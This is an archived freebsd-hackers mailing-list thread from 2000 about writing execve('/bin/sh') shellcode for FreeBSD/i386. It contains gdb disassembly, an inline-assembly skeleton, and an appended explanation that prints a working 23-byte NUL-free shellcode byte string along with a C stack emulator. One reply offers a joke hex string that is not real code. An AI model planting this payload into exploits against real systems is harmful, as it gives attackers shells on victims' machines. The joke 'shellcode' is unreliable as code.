Re: Shell Code... (fwd)

2000-02-28 Thread Michael Kyle


Doug suggested that I send a message similar to this to
the group, instead of my original.  So, here is what I'd
replied to Doug.

Information or other approaches are appreciated.

Mike.
Yahoo!


-- Forwarded message --
Date: Thu, 24 Feb 2000 21:39:26 -0800 (PST)
From: Michael Kyle <[EMAIL PROTECTED]>
To: Doug White <[EMAIL PROTECTED]>
Subject: Re: Shell Code...


Doug,

You've been a FreeBSD advocate for quite a while; I'm new to
the OS and new to Yahoo.  I'm sure you know that Yahoo is a
FreeBSD org.  I really do need help whacking some of our development
stuff.  One of the things I am trying to do is demonstrate that
I can obtain shells on some of our internally used code, in specific
instances.  While I have never had a problem deriving my own shell code on
Solaris, IRIX or Linux, for some reason everything I do on FreeBSD
fails.

Do you happen to know where execve (syscall index 59) snags its
params?  Clearly a gdb dump of the assembler of a simple prog that does
nothing more than call execve passing /bin/sh shows the following

(gdb) disas main
Dump of assembler code for function main:
0x804814c :  pushl  %ebp
0x804814d :  movl   %esp,%ebp                # prolog stuff here
0x804814f :  subl   $0x8,%esp                # variables
0x8048152 :  movl   $0x804833d,0xfff8(%ebp)  # /bin/sh
0x8048159 :  movl   $0x0,0xfffc(%ebp)
0x8048160 :  pushl  $0x0                     # param 2 to execve
0x8048162 :  leal   0xfff8(%ebp),%eax
0x8048165 :  pushl  %eax                     # param 1
0x8048166 :  movl   0xfff8(%ebp),%eax
0x8048169 :  pushl  %eax                     # param 0
0x804816a :  call   0x80481e8                # the call
0x804816f :  addl   $0xc,%esp
0x8048172 :  leave
0x8048173 :  ret


and 

(gdb) disas execve
Dump of assembler code for function execve:
0x80481e8 :  leal   0x3b,%eax    # syscall index
0x80481ee :  int    $0x80        # kernel call -- must know
                                 # where to find params
0x80481f0 :  jb     0x80481e0    # a jump
0x80481f2 :  ret
0x80481f3 :  nop
End of assembler dump.


and for the jb, 

(gdb) disas 0x80481e0

0x80481e0 :  jmp    0x8048307 <.cerror>
0x80481e5 :  leal   0x0(%esi),%esi



Clearly, a kernel call is performed (index 0x3b) with the
passed info on the stack and as an offset to the frame pointer
in main.  I've tried referencing the values on the stack and
seem to screw it up.

Any suggestions?  What you sent me, do I need to
expand?

Mike.



On Thu, 24 Feb 2000, Doug White wrote:

> On Thu, 24 Feb 2000, Michael Kyle wrote:
> 
> > 
> > Hi does anyone have shellcode for freebsd.  If not, 
> > I'll disassemble execve, but I'd rather just pick
> > it up from the group.
> 
> Yeah, the shellcode is
> 
> 
>0xb238fb23b238gub2348b223bdfz23a89230934897a324987287bd8970d8997893981deadbeef21398778787aaa9797bb8979878d87f87
> 
> Doug White|  FreeBSD: The Power to Serve
> [EMAIL PROTECTED] |  www.FreeBSD.org
> 
> 
> 
> To Unsubscribe: send mail to [EMAIL PROTECTED]
> with "unsubscribe freebsd-hackers" in the body of the message
> 
> 







RE: Shell Code... (fwd)

2000-03-02 Thread Yevmenkin, Maksim N, CSCIO

hello all,

in case you still need it :)

here is a good skeleton for shell code :-) I DO NOT want to put
REAL shell code here. Just do ``x/32bx main'' and you will
see what you want. :)

I'm too lazy to write in assembler and hate AT&T syntax :)

<-- cut here ->

char	*cmd = "/bin/sh";
char	*arg[] = { "sh", 0 };

int
main(void)
{
	/* execve(cmd, argv, env), built the way the libc stub is called */
	__asm__ __volatile__(
		/* pass ``env'' == NULL */
		"xorl	%eax,%eax\n\t"
		"pushl	%eax\n\t"

		/* pass ``argv[]'' */
		"pushl	$arg\n\t"

		/* pass ``cmd'' (the pointer stored in cmd, i.e. the address of "/bin/sh") */
		"movl	$cmd,%edx\n\t"
		"movl	(%edx),%eax\n\t"
		"pushl	%eax\n\t"

		/* simulate ``libc call'': the kernel expects a return address at 0(%esp) */
		"pushl	%ecx\n\t"

		/* system call */
		"xorl	%eax,%eax\n\t"
		"movb	$0x3b,%al\n\t"
		"int	$0x80\n\t"
	);
	return 1;	/* only reached if execve fails */
}


<- end cut -->

thanks
emax


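Mike's question about where the kernel picks up execve's parameters and emax's skeleton both come down to the same FreeBSD/i386 int $0x80 convention: the syscall number goes in %eax, and the kernel copies the arguments in from 4(%esp) upward, because it assumes a libc stub's `call` left a return address at 0(%esp). The C program below is an added example, not code from either post. It hand-assembles the classic 23-byte NUL-free execve("/bin//sh") payload for FreeBSD/i386, runs it on a tiny model of the stack (only the handful of opcodes the payload uses are decoded, and the stack-top address 0xbfbff000 is an arbitrary assumption), and then reads the resulting frame the way the kernel would, so you can see that the dummy push is what lands path, argv and envp at 4, 8 and 12 bytes above %esp.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* execve("/bin//sh", argv, NULL) for FreeBSD/i386, hand-assembled for this
 * example. "//sh" makes every pushed word NUL-free. */
static const unsigned char sc[] =
    "\x31\xc0"      /* xorl  %eax,%eax                               */
    "\x50"          /* pushl %eax        NUL terminator for the path */
    "\x68//sh"      /* pushl $0x68732f2f "//sh"                      */
    "\x68/bin"      /* pushl $0x6e69622f "/bin"                      */
    "\x89\xe3"      /* movl  %esp,%ebx   %ebx -> "/bin//sh"          */
    "\x50"          /* pushl %eax        envp = NULL                 */
    "\x54"          /* pushl %esp        argv -> that NULL word      */
    "\x53"          /* pushl %ebx        path                        */
    "\x50"          /* pushl %eax        fake return address         */
    "\xb0\x3b"      /* movb  $0x3b,%al   SYS_execve                  */
    "\xcd\x80";     /* int   $0x80                                   */
#define SC_LEN (sizeof(sc) - 1)

#define STACK_TOP 0xbfbff000u   /* assumed stack top; any value works for the model */
#define MEM_SIZE  64            /* bytes of model stack just below STACK_TOP */

struct cpu {
    uint32_t eax, ebx, esp;
    uint8_t  mem[MEM_SIZE];     /* models [STACK_TOP - MEM_SIZE, STACK_TOP) */
};

static uint8_t *mptr(struct cpu *c, uint32_t addr, uint32_t n)
{
    assert(addr >= STACK_TOP - MEM_SIZE && addr + n <= STACK_TOP);
    return c->mem + (addr - (STACK_TOP - MEM_SIZE));
}

static uint32_t imm32(const unsigned char *p)   /* little-endian word */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static uint32_t ld32(struct cpu *c, uint32_t addr) { return imm32(mptr(c, addr, 4)); }

static void push32(struct cpu *c, uint32_t v)
{
    uint8_t *p;
    c->esp -= 4;
    p = mptr(c, c->esp, 4);
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Decodes only the encodings the payload uses; returns 1 when int $0x80 is reached. */
static int run(struct cpu *c, const unsigned char *code, size_t len)
{
    size_t ip = 0;
    memset(c, 0, sizeof *c);
    c->esp = STACK_TOP;
    while (ip < len) {
        unsigned char op = code[ip], next = ip + 1 < len ? code[ip + 1] : 0;
        if (op == 0x31 && next == 0xc0)      { c->eax = 0;                          ip += 2; }
        else if (op == 0x50)                 { push32(c, c->eax);                   ip += 1; }
        else if (op == 0x53)                 { push32(c, c->ebx);                   ip += 1; }
        else if (op == 0x54)                 { push32(c, c->esp);                   ip += 1; }
        else if (op == 0x68 && ip + 4 < len) { push32(c, imm32(code + ip + 1));     ip += 5; }
        else if (op == 0x89 && next == 0xe3) { c->ebx = c->esp;                     ip += 2; }
        else if (op == 0xb0 && ip + 1 < len) { c->eax = (c->eax & ~0xffu) | next;   ip += 2; }
        else if (op == 0xcd && next == 0x80) { return 1; }
        else return 0;                       /* opcode outside this model */
    }
    return 0;
}

struct execve_args { uint32_t nr; const char *path; uint32_t argv0, envp; };

/* What the FreeBSD/i386 kernel does at the trap: number from %eax, arguments
 * from 4(%esp) upward, skipping the word at 0(%esp) where a libc stub's
 * `call` would have left its return address. */
static int kernel_view(struct cpu *c, struct execve_args *a)
{
    uint32_t argv;
    if (!run(c, sc, SC_LEN)) return 0;
    a->nr    = c->eax;
    a->path  = (const char *)mptr(c, ld32(c, c->esp + 4), 1);
    argv     = ld32(c, c->esp + 8);
    a->argv0 = ld32(c, argv);           /* argv[0] */
    a->envp  = ld32(c, c->esp + 12);
    return 1;
}

static int has_nul(const unsigned char *p, size_t n) { return memchr(p, 0, n) != NULL; }

int main(void)
{
    struct cpu c;
    struct execve_args a;
    if (!kernel_view(&c, &a)) { puts("model stopped before int $0x80"); return 1; }
    printf("%zu bytes, NUL-free: %s\n", SC_LEN, has_nul(sc, SC_LEN) ? "no" : "yes");
    printf("eax=%#x (SYS_execve) path=\"%s\" argv[0]=%#x envp=%#x\n", a.nr, a.path, a.argv0, a.envp);
    return 0;
}
```

Drop the final `pushl %eax` from the byte string and the model shows path sitting at 0(%esp), where the kernel never looks; that is the usual reason Linux-style shellcode (arguments in %ebx, %ecx, %edx) fails unchanged on FreeBSD. The model executes nothing natively, so running the real bytes still needs a FreeBSD/i386 host.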